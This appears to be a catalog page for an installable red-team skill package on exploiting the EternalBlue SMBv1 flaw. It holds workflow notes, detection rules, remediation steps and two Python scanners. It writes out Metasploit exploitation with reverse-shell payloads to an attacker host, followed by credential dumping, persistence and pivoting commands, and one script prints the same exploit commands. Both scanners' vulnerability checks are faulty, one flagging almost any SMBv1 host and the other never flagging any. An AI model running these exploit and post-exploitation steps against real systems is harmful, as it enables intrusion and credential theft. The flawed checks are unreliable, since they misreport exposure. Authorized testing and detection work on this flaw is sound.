red teaming

Exploiting MS17-010 EternalBlue Vulnerability

MS17-010 (EternalBlue) is a critical vulnerability in Microsoft's SMBv1 implementation that allows remote code execution. Originally discovered by the NSA and leaked by the Shadow Brokers in 2017, it was used in the WannaCry and NotPetya ransomware campaigns. Despite patches being available since March 2017, many organizations still have unpatched systems, making it a viable red team exploitation vector especially in legacy environments.

adversary-simulationeternalblueexploitationmitre-attackpost-exploitationred-teamremote-code-executionsmb
Install this skill
npx skills add mukul975/Anthropic-Cybersecurity-Skills
Framework mappings

Overview

MS17-010 (EternalBlue) is a critical vulnerability in Microsoft's SMBv1 implementation that allows remote code execution. Originally discovered by the NSA and leaked by the Shadow Brokers in 2017, it was used in the WannaCry and NotPetya ransomware campaigns. Despite patches being available since March 2017, many organizations still have unpatched systems, making it a viable red team exploitation vector especially in legacy environments.

When to Use

  • When performing authorized security testing that involves exploiting ms17 010 eternalblue vulnerability
  • When analyzing malware samples or attack artifacts in a controlled environment
  • When conducting red team exercises or penetration testing engagements
  • When building detection capabilities based on offensive technique understanding

Prerequisites

  • Familiarity with red teaming concepts and tools
  • Access to a test or lab environment for safe execution
  • Python 3.8+ with required dependencies installed
  • Appropriate authorization for any testing activities

MITRE ATT&CK Mapping

  • T1210 - Exploitation of Remote Services
  • T1190 - Exploit Public-Facing Application
  • T1569.002 - System Services: Service Execution

Workflow

Phase 1: Vulnerability Scanning

  1. Scan target networks for SMB port 445
  2. Check for SMBv1 protocol support
  3. Run MS17-010 vulnerability check (Nmap NSE script or Metasploit auxiliary)
  4. Document vulnerable systems with OS version and patch level

Phase 2: Exploitation

  1. Select appropriate exploit variant based on target OS
  2. Configure exploit payload (Meterpreter, Cobalt Strike beacon, custom shellcode)
  3. Execute exploit against confirmed vulnerable target
  4. Verify code execution and establish session

Phase 3: Post-Exploitation

  1. Establish persistence on compromised system
  2. Dump credentials from memory
  3. Use compromised host as pivot point
  4. Document exploitation evidence

Tools and Resources

Tool Purpose
Nmap ms-17-010 NSE scripts Vulnerability detection
Metasploit ms17_010_eternalblue Exploitation module
Metasploit ms17_010_psexec Alternative exploitation
AutoBlue-MS17-010 Standalone Python exploit
CrackMapExec Mass SMB vulnerability scanning

Detection Indicators

  • IDS/IPS signatures for EternalBlue exploit traffic
  • SMBv1 negotiation from unusual source hosts
  • Event ID 7045: New service installation after exploitation
  • Anomalous named pipe activity on SMB
  • Large SMB write requests characteristic of buffer overflow

Validation Criteria

  • Vulnerable systems identified via scanning
  • Exploitation achieved on authorized target
  • Code execution confirmed with session established
  • Post-exploitation activities documented
  • Remediation recommendations provided
Source materials

References and resources

Everything below is rendered for inspection. Script files are read-only and never run.

References 3

api-reference.md2.0 KB

API Reference: MS17-010 (EternalBlue) Detection

CVE-2017-0144 — EternalBlue

Affected Systems

  • Windows XP, Vista, 7, 8, 8.1, 10 (pre-patch)
  • Windows Server 2003, 2008, 2008 R2, 2012, 2016 (pre-patch)

Protocol: SMBv1 (Port 445)

Nmap NSE Script

Check for MS17-010

nmap -p 445 --script smb-vuln-ms17-010 <target>

Output (Vulnerable)

PORT    STATE SERVICE
445/tcp open  microsoft-ds
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers
|     Risk factor: HIGH  CVSSv2: 9.3

SMB Protocol Basics

Negotiate Protocol Request

Offset Size Field
0 4 NetBIOS Session header
4 4 SMB magic (0xFF534D42)
8 1 Command (0x72 = Negotiate)
9 4 Status
13 1 Flags

SMB Versions

Version Protocol Notes
SMBv1 NT LM 0.12 Vulnerable to EternalBlue
SMBv2 SMB 2.002 Not vulnerable
SMBv3 SMB 3.0 Not vulnerable

Python Socket Check

SMBv1 Connection Test

import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect((target, 445))
sock.send(SMB_NEGOTIATE_PACKET)
response = sock.recv(4096)

Metasploit Module (Authorized Testing)

Scanner

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS <target>
run

Detection Events

Source Indicator
Windows Event 7036 Service state change
Sysmon Event 3 Network connection to 445
IDS Signature for EternalBlue SMB exploit

Remediation

  1. Apply MS17-010 patch (KB4012598 / KB4013389)
  2. Disable SMBv1: Set-SmbServerConfiguration -EnableSMB1Protocol $false
  3. Block port 445 at network perimeter
  4. Enable Windows Firewall rules for SMB

Suricata Detection Rule

alert tcp any any -> $HOME_NET 445 (msg:"ET EXPLOIT EternalBlue Attempt";
  flow:established,to_server; content:"|ff|SMB|73|";
  content:"|08 00|"; within:2; distance:54; sid:2024217;)
standards.md1.2 KB

Standards and Framework References

MITRE ATT&CK

Technique ID Name Tactic
T1210 Exploitation of Remote Services Lateral Movement
T1190 Exploit Public-Facing Application Initial Access
T1569.002 System Services: Service Execution Execution

CVE Details

  • CVE-2017-0143 through CVE-2017-0148 - Multiple SMBv1 remote code execution vulnerabilities
  • MS17-010 - Microsoft Security Bulletin (March 14, 2017)
  • CVSS Score: 9.3 (Critical)
  • Affected: Windows XP through Windows Server 2016

Affected Systems

OS Version Vulnerable
Windows XP SP3 Yes (no longer supported)
Windows 7 SP1 Yes (patched with KB4012212)
Windows Server 2008 R2 SP1 Yes (patched with KB4012212)
Windows Server 2012 R2 Yes (patched with KB4012213)
Windows 10 1607 and earlier Yes (patched with KB4013198)
Windows Server 2016 RTM Yes (patched with KB4013429)

NIST NVD References

  • CVE-2017-0144: Buffer overflow in SMBv1 server
  • Allows remote attackers to execute arbitrary code via crafted packets

Detection Signatures

  • Snort SID 41978: SMB EternalBlue exploit attempt
  • Suricata: ET EXPLOIT Possible MS17-010 SMB Request
workflows.md2.1 KB

EternalBlue Exploitation Workflows

Workflow 1: Vulnerability Detection

Nmap NSE Scripts

# Check for MS17-010 vulnerability
nmap -p 445 --script smb-vuln-ms17-010 10.0.0.0/24
 
# Extended SMB vulnerability scan
nmap -p 445 --script smb-vuln-* 10.0.0.1
 
# SMB version detection
nmap -p 445 --script smb-protocols 10.0.0.1

CrackMapExec

# Mass scan for MS17-010
crackmapexec smb 10.0.0.0/24 -M ms17-010
 
# Check with authentication
crackmapexec smb 10.0.0.0/24 -u user -p password -M ms17-010

Metasploit Auxiliary Scanner

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.0.0.0/24
set THREADS 10
run

Workflow 2: Exploitation with Metasploit

EternalBlue Module

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.0.0.1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.0.0.100
set LPORT 443
exploit
 
# Post-exploitation
meterpreter > getuid
meterpreter > sysinfo
meterpreter > hashdump
meterpreter > load kiwi
meterpreter > creds_all

EternalRomance/Synergy (PsExec variant)

use exploit/windows/smb/ms17_010_psexec
set RHOSTS 10.0.0.1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.100
set SMBUser ""
set SMBPass ""
exploit

Workflow 3: Post-Exploitation

Credential Dumping

meterpreter > load kiwi
meterpreter > creds_all
meterpreter > kerberos_ticket_list
meterpreter > lsa_dump_secrets

Persistence

meterpreter > run persistence -U -i 30 -p 4444 -r 10.0.0.100
meterpreter > run post/windows/manage/enable_rdp

Pivoting

meterpreter > run post/multi/manage/autoroute
meterpreter > portfwd add -l 445 -p 445 -r 10.0.1.1

OPSEC Considerations

  1. EternalBlue exploitation is noisy and easily detected by IDS/IPS
  2. Modern EDR solutions detect named pipe and service creation patterns
  3. Exploitation may crash the target system (especially on 32-bit systems)
  4. Use only against confirmed vulnerable systems within ROE scope
  5. Prefer authenticated exploitation variants when credentials are available
  6. Document any system crashes or instability immediately

Scripts 2

agent.py4.4 KB
Display-only source. This catalog never executes bundled scripts.
#!/usr/bin/env python3
"""Agent for detecting MS17-010 (EternalBlue) vulnerability — authorized testing only."""

import argparse
import json
import socket
import subprocess
from datetime import datetime, timezone


SMB_NEGOTIATE = (
    b"\x00\x00\x00\x85"  # NetBIOS
    b"\xff\x53\x4d\x42"  # SMB magic
    b"\x72"              # Negotiate Protocol
    b"\x00\x00\x00\x00"  # Status
    b"\x18\x53\xc8"      # Flags
    b"\x00\x00"           # Flags2
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  # Extra
    b"\x00\x00\xff\xfe\x00\x00\x00\x00"           # TreeID/PID
    b"\x00\x00\x00\x00"  # UserID/MuxID
    b"\x00"              # WordCount
    b"\x62\x00"          # ByteCount
    b"\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f"
    b"\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"
    b"\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f"
    b"\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00"
    b"\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"
    b"\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"
    b"\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"
)


def check_ms17_010(target_ip, port=445, timeout=5):
    """Check if target is vulnerable to MS17-010 via SMB negotiation."""
    result = {
        "target": target_ip,
        "port": port,
        "smb_open": False,
        "vulnerable": False,
        "os_info": "",
    }
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        sock.connect((target_ip, port))
        result["smb_open"] = True
        sock.send(SMB_NEGOTIATE)
        data = sock.recv(4096)
        if len(data) > 36:
            result["os_info"] = "SMB service responding"
            if data[4:8] == b"\xff\x53\x4d\x42":
                result["smb_version"] = "SMBv1"
        sock.close()
    except (socket.timeout, ConnectionRefusedError, OSError):
        pass
    return result


def nmap_ms17_010_check(target_ip):
    """Use nmap NSE script to check for MS17-010."""
    try:
        result = subprocess.check_output(
            ["nmap", "-p", "445", "--script", "smb-vuln-ms17-010", target_ip],
            text=True, errors="replace", timeout=30
        )
        vulnerable = "VULNERABLE" in result
        return {
            "target": target_ip,
            "method": "nmap",
            "vulnerable": vulnerable,
            "output": result[:500],
        }
    except (subprocess.SubprocessError, FileNotFoundError):
        return {"target": target_ip, "method": "nmap", "status": "nmap not available"}


def scan_network(cidr, port=445):
    """Scan a network range for SMB port and MS17-010."""
    import ipaddress
    results = []
    try:
        network = ipaddress.ip_network(cidr, strict=False)
    except ValueError:
        return results
    for ip in list(network.hosts())[:256]:
        ip_str = str(ip)
        result = check_ms17_010(ip_str, port, timeout=2)
        if result["smb_open"]:
            results.append(result)
    return results


def main():
    parser = argparse.ArgumentParser(
        description="Detect MS17-010 EternalBlue vulnerability (authorized testing only)"
    )
    parser.add_argument("--target", help="Target IP address")
    parser.add_argument("--network", help="Network CIDR to scan")
    parser.add_argument("--nmap", action="store_true", help="Use nmap NSE script")
    parser.add_argument("--output", "-o", help="Output JSON report")
    args = parser.parse_args()

    print("[*] MS17-010 (EternalBlue) Vulnerability Detection Agent")
    print("[!] For authorized security testing only")
    report = {"timestamp": datetime.now(timezone.utc).isoformat(), "findings": []}

    if args.target:
        if args.nmap:
            result = nmap_ms17_010_check(args.target)
        else:
            result = check_ms17_010(args.target)
        report["findings"].append(result)
        print(f"[*] {args.target}: SMB open={result.get('smb_open')}")

    if args.network:
        results = scan_network(args.network)
        report["findings"].extend(results)
        print(f"[*] Network scan: {len(results)} hosts with SMB open")

    report["risk_level"] = "CRITICAL" if any(f.get("vulnerable") for f in report["findings"]) else "LOW"

    if args.output:
        with open(args.output, "w") as f:
            json.dump(report, f, indent=2)
        print(f"[*] Report saved to {args.output}")
    else:
        print(json.dumps(report, indent=2))


if __name__ == "__main__":
    main()
process.py9.6 KB
Display-only source. This catalog never executes bundled scripts.
#!/usr/bin/env python3
"""
MS17-010 EternalBlue Scanner and Reporter

Scans for MS17-010 vulnerability and generates reports:
- SMB version detection
- MS17-010 vulnerability checking via SMB negotiation
- Exploitation command generation
- Assessment report generation

Usage:
    python process.py --scan 10.0.0.0/24 --output scan_results.json
    python process.py --check 10.0.0.1 --verbose
    python process.py --report scan_results.json --output report.md

Requirements:
    pip install impacket rich
"""

import argparse
import ipaddress
import json
import socket
import struct
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed
from datetime import datetime
from pathlib import Path

try:
    from rich.console import Console
    from rich.table import Table
    from rich.panel import Panel
    from rich.progress import Progress
except ImportError:
    print("[!] Missing dependencies. Install with: pip install rich")
    sys.exit(1)

console = Console()

# SMB negotiation packet for MS17-010 detection
SMB_NEGOTIATE = bytes.fromhex(
    "00000085ff534d4272000000001853c00000000000000000000000000000fffe00004000"
    "006200025043204e4554574f524b2050524f4752414d20312e3000024c414e4d414e312e"
    "3000024e54204c414e4d414e20312e30000257696e646f777320666f7220576f726b6772"
    "6f75707320332e316100024c4d312e32583030320002"
    "4c414e4d414e322e3100024e54204c4d20302e313200"
)

# SMB session setup for MS17-010 tree connect check
SMB_SESSION_SETUP = bytes.fromhex(
    "00000088ff534d4273000000001807c00000000000000000000000000000fffe0000"
    "4000000dff00000000000000000000000000004a000000000044000200013a0000"
    "4e544c4d53535000010000000732000006000600330000000b000b0028000000"
    "050093080000000f574f524b53544154494f4e"
)


def check_ms17_010(ip: str, port: int = 445, timeout: int = 5) -> dict:
    """Check if a host is vulnerable to MS17-010."""
    result = {
        "ip": ip,
        "port": port,
        "smb_open": False,
        "vulnerable": False,
        "os_info": "",
        "error": None,
    }

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        sock.connect((ip, port))
        result["smb_open"] = True

        # Send SMB negotiate
        sock.send(SMB_NEGOTIATE)
        response = sock.recv(4096)

        if len(response) > 36:
            # Check SMB header for response
            if response[4:8] == b'\xffSMB':
                result["os_info"] = "SMBv1 supported"

                # Check dialect index for SMBv1 support
                dialect_index = struct.unpack('<H', response[37:39])[0] if len(response) > 39 else 0

                # Basic vulnerability check based on SMBv1 support
                # A proper check requires tree connect to IPC$ and transaction request
                if dialect_index < 0xFFFF:
                    result["vulnerable"] = True
                    result["os_info"] = "SMBv1 enabled - potentially vulnerable (confirm with Nmap/Metasploit)"

        sock.close()

    except socket.timeout:
        result["error"] = "Connection timeout"
    except ConnectionRefusedError:
        result["error"] = "Connection refused"
    except OSError as e:
        result["error"] = str(e)

    return result


def scan_network(network: str, port: int = 445, threads: int = 50, timeout: int = 5) -> list[dict]:
    """Scan network range for MS17-010 vulnerability."""
    results = []

    try:
        targets = list(ipaddress.ip_network(network, strict=False).hosts())
    except ValueError as e:
        console.print(f"[red][-] Invalid network: {e}[/red]")
        return results

    console.print(f"[yellow][*] Scanning {len(targets)} hosts on port {port}...[/yellow]")

    with Progress() as progress:
        task = progress.add_task("[cyan]Scanning...", total=len(targets))

        with ThreadPoolExecutor(max_workers=threads) as executor:
            futures = {
                executor.submit(check_ms17_010, str(ip), port, timeout): str(ip)
                for ip in targets
            }

            for future in as_completed(futures):
                result = future.result()
                if result["smb_open"]:
                    results.append(result)
                    if result["vulnerable"]:
                        console.print(f"[red][!] VULNERABLE: {result['ip']}[/red]")
                    else:
                        console.print(f"[green][+] SMB open: {result['ip']}[/green]")
                progress.update(task, advance=1)

    return results


def generate_exploit_commands(target_ip: str) -> dict:
    """Generate exploitation commands for a vulnerable host."""
    commands = {
        "metasploit_eternalblue": [
            "msfconsole",
            "use exploit/windows/smb/ms17_010_eternalblue",
            f"set RHOSTS {target_ip}",
            "set PAYLOAD windows/x64/meterpreter/reverse_tcp",
            "set LHOST <ATTACKER_IP>",
            "set LPORT 443",
            "exploit",
        ],
        "metasploit_psexec": [
            "use exploit/windows/smb/ms17_010_psexec",
            f"set RHOSTS {target_ip}",
            "set PAYLOAD windows/meterpreter/reverse_tcp",
            "set LHOST <ATTACKER_IP>",
            "exploit",
        ],
        "nmap_verification": [
            f"nmap -p 445 --script smb-vuln-ms17-010 {target_ip}",
            f"nmap -p 445 --script smb-protocols {target_ip}",
        ],
        "crackmapexec": [
            f"crackmapexec smb {target_ip} -M ms17-010",
        ],
    }
    return commands


def generate_report(scan_results: list[dict], output_path: str):
    """Generate MS17-010 assessment report."""
    vulnerable = [r for r in scan_results if r.get("vulnerable")]
    smb_open = [r for r in scan_results if r.get("smb_open")]

    report = f"""# MS17-010 (EternalBlue) Vulnerability Assessment
## Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}

---

## 1. Executive Summary

Scanned network for MS17-010 (EternalBlue) vulnerability affecting SMBv1.
**{len(vulnerable)}** potentially vulnerable hosts identified out of
**{len(smb_open)}** hosts with SMB port 445 open.

**Risk Level:** {"CRITICAL" if vulnerable else "LOW"}

## 2. Vulnerability Overview

| Field | Value |
|-------|-------|
| CVE | CVE-2017-0143 through CVE-2017-0148 |
| CVSS | 9.3 (Critical) |
| Bulletin | MS17-010 |
| Protocol | SMBv1 |
| Impact | Remote Code Execution (SYSTEM) |
| Patch Available | Yes (March 2017) |

## 3. Scan Results

### Potentially Vulnerable Hosts

| IP Address | Port | OS Info | Status |
|-----------|------|---------|--------|
"""
    for r in vulnerable:
        report += f"| {r['ip']} | {r['port']} | {r.get('os_info', 'N/A')} | VULNERABLE |\n"

    report += """
### SMB Open (Not Vulnerable or Patched)

| IP Address | Port | Notes |
|-----------|------|-------|
"""
    for r in smb_open:
        if not r.get("vulnerable"):
            report += f"| {r['ip']} | {r['port']} | {r.get('os_info', 'Patched or SMBv1 disabled')} |\n"

    report += f"""
## 4. Recommendations

### Immediate Actions
1. Apply MS17-010 patches to all vulnerable systems immediately
2. Disable SMBv1 protocol on all systems where not required
3. Block SMB port 445 at network perimeter

### Commands to Disable SMBv1
```powershell
# Windows Server 2012 R2+
Set-SmbServerConfiguration -EnableSMB1Protocol $false

# Windows 10/Server 2016+
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol

# Group Policy
# Computer Configuration > Admin Templates > Network > Lanman Server
# Set "SMB1" to Disabled
```

## 5. MITRE ATT&CK Mapping
- T1210 - Exploitation of Remote Services
- T1190 - Exploit Public-Facing Application
"""

    out = Path(output_path)
    out.parent.mkdir(parents=True, exist_ok=True)
    with open(out, "w") as f:
        f.write(report)

    console.print(f"[green][+] Report saved to: {output_path}[/green]")


def main():
    parser = argparse.ArgumentParser(description="MS17-010 EternalBlue Scanner")
    parser.add_argument("--scan", help="Network range to scan (CIDR notation)")
    parser.add_argument("--check", help="Check single host")
    parser.add_argument("--threads", type=int, default=50, help="Scan threads")
    parser.add_argument("--timeout", type=int, default=5, help="Connection timeout")
    parser.add_argument("--exploit-commands", help="Generate exploit commands for IP")
    parser.add_argument("--report", help="Generate report from scan results JSON")
    parser.add_argument("--output", default="./ms17010_report.md", help="Output path")

    args = parser.parse_args()

    if args.check:
        result = check_ms17_010(args.check, timeout=args.timeout)
        table = Table(title=f"MS17-010 Check: {args.check}")
        table.add_column("Property", style="cyan")
        table.add_column("Value", style="green")
        for k, v in result.items():
            table.add_row(k, str(v))
        console.print(table)

    elif args.scan:
        results = scan_network(args.scan, threads=args.threads, timeout=args.timeout)

        # Save results
        json_path = args.output.replace(".md", ".json")
        with open(json_path, "w") as f:
            json.dump(results, f, indent=2)
        console.print(f"[green][+] Scan results saved to: {json_path}[/green]")

        generate_report(results, args.output)

    elif args.exploit_commands:
        commands = generate_exploit_commands(args.exploit_commands)
        for method, cmds in commands.items():
            console.print(Panel("\n".join(cmds), title=method))

    elif args.report:
        with open(args.report) as f:
            results = json.load(f)
        generate_report(results, args.output)

    else:
        console.print("[yellow]Use --scan <CIDR>, --check <IP>, or --exploit-commands <IP>[/yellow]")


if __name__ == "__main__":
    main()

Assets 1

template.mdtext/markdown · 0.7 KB
Keep exploring